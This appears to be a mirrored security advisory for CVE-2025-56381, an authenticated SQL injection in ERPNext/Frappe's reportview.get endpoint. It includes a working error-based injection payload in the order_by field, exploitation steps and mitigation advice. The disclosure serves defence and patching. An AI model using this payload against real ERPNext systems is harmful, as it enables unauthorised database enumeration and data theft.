来源

关联漏洞

描述

ERPNEXT v15.67.0 was discovered to contain multiple SQL injection  vulnerabilities in the /api/method/frappe.desk.reportview.get endpoint via the order_by and group_by parameters.

介绍

# CVE-2025-56381 — Authenticated SQL Injection in ERPNext / Frappe via `order_by` and `group_by` Parameters

📌 **Summary**
ERPNext v15.67.0 and Frappe Framework v15.72.4 contain multiple **authenticated SQL injection vulnerabilities** in the `frappe.desk.reportview.get` API endpoint. Malicious input to the `order_by` or `group_by` parameters can be used to inject and execute arbitrary SQL statements. This allows an authenticated user (with basic access to reports) to extract sensitive data, perform database enumeration, and potentially manipulate or escalate privileges within the system.

---

## 🛠 Technical Details

* **Vulnerability Type:** SQL Injection (CWE-89)
* **Affected Product(s):** ERPNext / Frappe
* **Affected Versions:**

  * Frappe — **15.72.4**
  * ERPNext — **15.67.0**
* **Affected Endpoint:**

  ```
  POST /api/method/frappe.desk.reportview.get
  ```
* **Vulnerable Parameters:**

  * `order_by`
  * `group_by`
* **Authentication Required:** Yes (valid session via `sid` cookie)
* **Attack Type:** Remote
* **Severity:** High (SQL code execution, data exfiltration, potential privilege escalation)
* **Estimated CVSS v3.1 Score:** **8.6 (High)** — *estimate; final score should be assigned by official CVE authority.*
* **Status:** Not fixed (as of disclosure)
* **Discovered by:** Mohammed Aloli ([GitHub](https://github.com/MoAlali), [X](https://x.com/alaliksa_), [LinkedIn](https://www.linkedin.com/in/mohammedaloli/))
* **CVE ID:** **CVE-2025-56381**

---

## 🚀 Proof of Concept (PoC) — Error-based SQL Injection
<img width="1072" height="1376" alt="image" src="https://github.com/user-attachments/assets/ef4a77fa-a9f5-417f-baf0-5ebcef3523ce" />

> ✅ Test only on systems you **own** or have **explicit permission** to test. Do **not** use against production systems without consent.

### ❗ Payload (URL-encoded):

```text
%28select%20updatexml%28null%2Cconcat%280x7e%2Cdatabase%28%29%2C0x7e%29%2Cnull%29%29
```

### Example JSON Body (POST Request):

```json
{
  "doctype": "User",
  "order_by": "(select updatexml(null,concat(0x7e,database(),0x7e),null))"
}
```
This confirms that SQL injection has been successfully executed and the current database name has been leaked.

---

## 🧪 Exploitation Scenario

1. An attacker logs into an ERPNext/Frappe instance with basic permissions (e.g., access to standard reports).
2. A crafted POST request is sent to `/api/method/frappe.desk.reportview.get` with a malicious `order_by` or `group_by` payload.
3. The backend improperly injects this value directly into an SQL query without sanitization.
4. The attacker sees a database error revealing injected output — confirming the injection.
5. The same technique could be chained with time-based payloads, UNION-based injection, or privilege escalation paths depending on the underlying database configuration.

---

## 🔐 Mitigation Recommendations

1. **Use Parameterized Queries:** All user input must be bound securely and **never** concatenated directly into SQL queries.
2. **Strict Input Validation:** Validate `order_by` and `group_by` against a known allowlist of acceptable column names before processing.
3. **Escape Identifiers Properly:** Use DBMS-specific escaping for column/field identifiers if dynamic usage is required.
4. **Minimize Exposure:** Restrict access to the `/reportview.get` API and report features based on user roles and trust levels.
5. **Sanitize Logs:** Avoid logging raw injection payloads to prevent leakage in audit systems.
6. **Rate Limit API Requests:** Throttle high-frequency API calls to reduce the impact of blind or error-based enumeration attempts.
7. **Apply Patches:** Frappe maintainers should release a patch securing this endpoint and audit other `frappe.desk` methods. Operators should upgrade as soon as a patch is available.

---

## 🔗 References

* Discoverer: [Mohammed Aloli](https://www.linkedin.com/in/mohammedaloli/)

  * GitHub: [MoAlali](https://github.com/MoAlali)
  * X (Twitter): [@alaliksa_](https://x.com/alaliksa_)
* Frappe Framework: [https://github.com/frappe/frappe](https://github.com/frappe/frappe)
* ERPNext Project: [https://github.com/frappe/erpnext](https://github.com/frappe/erpnext)
* OWASP SQL Injection Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)

## 📢 Disclaimer

This advisory is published for educational and defensive security research purposes only. Exploiting this vulnerability without authorization is illegal and unethical. If you're a developer or administrator of ERPNext or Frappe, apply the recommended mitigations immediately and monitor for unusual API usage.

---

文件快照

 [4.0K]  /data/pocs/57275b719f4dfb7e950d525c95367d638f187531
├── [1.2K]  advisory.md
├── [1.5K]  cve.json
└── [4.7K]  README.md

0 directories, 3 files

备注